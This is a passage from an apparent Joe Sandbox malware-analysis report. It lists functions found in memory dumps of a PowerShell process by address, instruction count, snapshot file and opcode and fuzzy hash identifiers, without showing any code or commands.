                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 52d7436cddcae8c33fc912450a4fede11e08ed5721bf84a378ef6009b304d9d0
                                                                                                                                                                                                                                                                                                                • Instruction ID: b564209ef904f785f70c8738a2b6332656ebf55d9e15e4b55caea86ef01f4d91
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52d7436cddcae8c33fc912450a4fede11e08ed5721bf84a378ef6009b304d9d0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D1126312083845FCB25CF79E49469A7FF0EF46254F1848DED089CB6A2C630BC84C751
                                                                                                                                                                                                                                                                                                                Function 049AF057 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                                                                                                • Instruction ID: d4dfb96b103323f235694e467a94abc369b51ac250e62a36660524fe32397d5c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6119D76504280DFDB15CF14D9C8B15BFB1FB84318F28C6AED8494B65AC33AE45ACBA1
                                                                                                                                                                                                                                                                                                                Function 04E9E0E8 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 81d34fdddbd46c22cdf3e225baf13375592295b9e687f04e59cf93b2b6df722b
                                                                                                                                                                                                                                                                                                                • Instruction ID: a396f3afd0716592f2d1c64655cb5b8539ad011abb100a4dcb658c8a86f108a2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d34fdddbd46c22cdf3e225baf13375592295b9e687f04e59cf93b2b6df722b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17018035700614CFCB11DB79E8086AEBBF5FB88215B10406DE50AD3242DB329915CF91
                                                                                                                                                                                                                                                                                                                Function 04E9E060 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 831c1ea678e092b8754dd3a42c05a164d1842788f5f6344abd381dd51586f09e
                                                                                                                                                                                                                                                                                                                • Instruction ID: ad0a215244dbc5517d23b14075760b4ee0a1cfa0afc15f94a8003d7baddc75ba
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 831c1ea678e092b8754dd3a42c05a164d1842788f5f6344abd381dd51586f09e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA1105382047508FC768DF39D09086ABBF6EF8931532489ADD48A8B7A1CB32E841CB50
                                                                                                                                                                                                                                                                                                                Function 04E9BF98 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c132434699e670fa44899e813dc8fa6608b01c9714b5a4ea865502f24bcb1f5d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5eef84a73b93bf852502f76e2de2386056a842b161ceae9aad4368d0960bda87
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c132434699e670fa44899e813dc8fa6608b01c9714b5a4ea865502f24bcb1f5d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC01243270D3D04FDB054B6DACD05BABFE4FFA6211B0841AEE494CB2A2C664D908DB10
                                                                                                                                                                                                                                                                                                                Function 049AD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: cd211d59457c8176dfae0906cd3262d24e2dc6fe58fd74ab63e41ece58a02d53
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2a720f275c6c767b82cf7b8e67afbbde53971542b923d2c7140a3e3fc77c2731
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd211d59457c8176dfae0906cd3262d24e2dc6fe58fd74ab63e41ece58a02d53
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 580126711093509AE7108E29ED84B67FFDDEF45324F18CA3AEC480B646D279E841C6F1
                                                                                                                                                                                                                                                                                                                Function 04E9BF38 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: b421487bb390ff89e08820376a4819d9ea73c4beaad9be7217a70c6f37c9c0f7
                                                                                                                                                                                                                                                                                                                • Instruction ID: f88bcfb336fbb9125d56d75a498d533b43e0023fd3e842f122c1176c2806ab4d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b421487bb390ff89e08820376a4819d9ea73c4beaad9be7217a70c6f37c9c0f7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11F0C8327193955FDB108E6A9C94ABBBFE9EF85221B0540BBF854C7291CA70DC408790
                                                                                                                                                                                                                                                                                                                Function 049AD006 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 59b5de826de85bd71f093152c47555c8caca1a9bc60b73dd3f537143b4ecbd8f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 057b142b664f18b4d89eba767d410e34d723c805d3c2a875a306ea6978acb13d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59b5de826de85bd71f093152c47555c8caca1a9bc60b73dd3f537143b4ecbd8f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E01757140E3C09EE7124B259C94756BFB8EF56224F1CC5DBD9884F593C2695844C7B1
                                                                                                                                                                                                                                                                                                                Function 04E990F8 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 77b4bb078b10bbff840e4ef8fef6030ace3bbf543951faa0c9549f8d52f2a797
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ce2e19334922f3fd59addc4cad187bf7e446a824d2777a26768984a19626921
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b4bb078b10bbff840e4ef8fef6030ace3bbf543951faa0c9549f8d52f2a797
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3F0F4356486444BE701AB74D4143EE7FE2DFC6369F1881AAD84A9B282CE392949C7E1
                                                                                                                                                                                                                                                                                                                Function 04E97958 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c297d9f369ffcac21a47079c1098bbeb2448d91e7e84a758f8fd96468a5fabb2
                                                                                                                                                                                                                                                                                                                • Instruction ID: b0c297a9d1edb4cc77def283a6e29742fd9cbab91086414dc962f89d4ccde1dd
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c297d9f369ffcac21a47079c1098bbeb2448d91e7e84a758f8fd96468a5fabb2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0F6312093509FDB129B29A8405AFBFF5EF89374714056DE04AD7392CA759C49C7A0
                                                                                                                                                                                                                                                                                                                Function 04E9BF48 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 24c89272c3099f2cf6ebb728ee6ecb7f5a780a87fe0c9d502ad75e69a2e56337
                                                                                                                                                                                                                                                                                                                • Instruction ID: a93d10bfc17d3bf43f83cf661848bd5f2d0117f61797e6dedbb91259826405af
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24c89272c3099f2cf6ebb728ee6ecb7f5a780a87fe0c9d502ad75e69a2e56337
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CF0BE323093641FD7108A6A9C849BBBFEDEBC9620B04417AF944C3391CAB0DC0086A0
                                                                                                                                                                                                                                                                                                                Function 049AD9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6b500cd8ba59f3474f97418c12f3aa70616884365c9b50ed65a42904a3266e1e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e0366137a619afd0ee484856836ec87cfdfbe93f8bc8572fd77cd9099a95aa3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b500cd8ba59f3474f97418c12f3aa70616884365c9b50ed65a42904a3266e1e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF0F976200600AF9720CF0ADD85C23FBAEEBD4770719C5AAE84A4B611C671FC51CEA0
                                                                                                                                                                                                                                                                                                                Function 04E9E001 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c6bb2af7043c0903ad8170da00508cd42a64bf15f6c57c25c23c9d306a91706f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2b5e49d20e04242665d5da063eed59c0259af8ba81fdb309c8d9a7f56ca89f46
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6bb2af7043c0903ad8170da00508cd42a64bf15f6c57c25c23c9d306a91706f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CF05E353052519FC711CB1CE454866BBF6AFCA31532950AFE545DF7B2DA22DC028750
                                                                                                                                                                                                                                                                                                                Function 049AD998 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 433fef3d48acf246c57cd1937d30b9a64baf404963167bbd6a367b20ac4019b0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 39a07dcdfbcf06dd4b6438df6bbf03304eb0290e16522b2d506b29a2b5f6353a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 433fef3d48acf246c57cd1937d30b9a64baf404963167bbd6a367b20ac4019b0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43F01D79100640AFD725CF06CD85D23BBBAEBC9764B298599E84A5B712C731FC42CFA0
                                                                                                                                                                                                                                                                                                                Function 04E97968 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c0d8b05294dc86adfedb7d4bb85fcc7777f9a52a71717850ccd10737f105035f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 363ba0fe3ea94003f8edf7333047d83e72a868bb10244d19ae8926bf73116b24
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0d8b05294dc86adfedb7d4bb85fcc7777f9a52a71717850ccd10737f105035f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F0A7323007149FDB10AB6AE84496FBBE9EBC8275B00052DE50AD3340DF31EC4587A4
                                                                                                                                                                                                                                                                                                                Function 04E9DE50 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 633d034425dc3326c37f79109591345e31f50b88a6fb16854c9079a80783a808
                                                                                                                                                                                                                                                                                                                • Instruction ID: d995a1c8f71c45f669d59d094f36964ffc7fa6e28cbf8b9d9a063a0af23056b1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 633d034425dc3326c37f79109591345e31f50b88a6fb16854c9079a80783a808
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0E5316456951F8712922D7C148BFBFEADEC617130441AEE049DB651CE16EC068BA1
                                                                                                                                                                                                                                                                                                                Function 04E97697 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ae8fc134e7099d02c657db2e3946ff5cd913e45c4143fb2fa92ae7285a01ca5e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 09780e7f016958c5dc5b45bc2adcc3e9d120246518f6430dd19d3a9faac45872
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae8fc134e7099d02c657db2e3946ff5cd913e45c4143fb2fa92ae7285a01ca5e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEF0A03A350204CFCF10EF6D9900A9ABBE2EBC8255B058569E909CB365DA34EC058BA1
                                                                                                                                                                                                                                                                                                                Function 04E99108 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 365e4c9aacc5a4e151af52ca1545bfe381a7b22813be772f6cc4ddf2003fa24f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e4cf680a863623e69f319e65b5f21a5148b578d13b5ea46033b34af709cf0b2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 365e4c9aacc5a4e151af52ca1545bfe381a7b22813be772f6cc4ddf2003fa24f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59F027356045044BE714AB64C0183AFBBD6EFC1719F10812AD90A47384CE393D06CBE1
                                                                                                                                                                                                                                                                                                                Function 04E98968 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 672e66419e2e17911479d14c9be6c1f3bad2511586f1c2d8e66216b05c18014c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 18230370adb584cae2004c5259b2f35dce0f9e2a254d1e1ae0903fcaf7094779
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 672e66419e2e17911479d14c9be6c1f3bad2511586f1c2d8e66216b05c18014c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BF0A0317096904FDB0A6B74A41C6AE7FA1EFC6365F0500AFD509CB283CF2A184AC7D6
                                                                                                                                                                                                                                                                                                                Function 04E9E010 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c74cc6ccee683dabd5ab28407e7fd48fb0a771e50b0579a6d30e15eb37ae06a1
                                                                                                                                                                                                                                                                                                                • Instruction ID: d9a80963dc8b48915fe9d2175d8ae769192afe4f1be90c00aa97547792b69823
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c74cc6ccee683dabd5ab28407e7fd48fb0a771e50b0579a6d30e15eb37ae06a1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32E06D353002009F8710DB1DD444C26B7EAEFCE75531950AAF545CB361DA21EC018B90
                                                                                                                                                                                                                                                                                                                Function 04E99177 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: d553deb25c6ae4cc5b1ec5d0709d11d8b0cd0774ae88d76c89ff191f0a5e359b
                                                                                                                                                                                                                                                                                                                • Instruction ID: b6c5b819a2f8a1a236bae5a60bba7f71d6c36e9af0198f601a8065fc769941d1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d553deb25c6ae4cc5b1ec5d0709d11d8b0cd0774ae88d76c89ff191f0a5e359b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74F0BE709097404FE7219F74D4A839A7FE1EF05314F0440AED98DC7282DB395885CB80
                                                                                                                                                                                                                                                                                                                Function 04E99560 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 10cd3c9fb790604bdd10f28a44296223d5ba04d9ed24bf3fd0991bc56cb3e1ca
                                                                                                                                                                                                                                                                                                                • Instruction ID: cf683822a4b72a5e9b297bee489ac20d66ef382795cf2837e9b523961a440af7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10cd3c9fb790604bdd10f28a44296223d5ba04d9ed24bf3fd0991bc56cb3e1ca
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE0D81275A2911FDF5627B828001F76FD74FC70A930500EBD944CB6D3DC449C0983B2
                                                                                                                                                                                                                                                                                                                Function 04E9DEA0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ac69e815c84e30bff7f3a44754278ef8a220fb62b84b2201b37daadea0240d65
                                                                                                                                                                                                                                                                                                                • Instruction ID: f7576dbdee3dccd2906c17769dc004faa7f0568017ce19f8e9d85e4047668572
